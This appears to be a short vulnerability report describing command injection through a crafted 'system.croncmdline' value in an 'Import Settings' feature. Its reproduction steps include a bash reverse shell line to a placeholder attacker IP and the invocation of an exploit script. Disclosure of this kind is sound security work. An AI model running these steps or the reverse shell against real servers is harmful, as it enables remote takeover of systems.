Description

Due to Improper data validation in “Import Settings” feature, an authenticated attacker can send crafted settings with malicious payload inside “system.croncmdline” value.

Step to reproduce

Requirement: PHP code must be executed on attacker machine

• Step 1: Attacker run web server and deliver foo.txt file. The contain of this file is a reverse shell to attacker machine, for example:

#!/bin/bash
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1

• Step 2: Run file exploit.py and required by this exploit

python3 exploit.py -t {VICTIM-WEBSERVER} -u {USERNAME} -p {PASSWORD} -s {ATTACKER-WEBSERVER} -lport {ATTACKER-LISTENING-PORT}

Proof of Concept

• PoC Video
• Exploit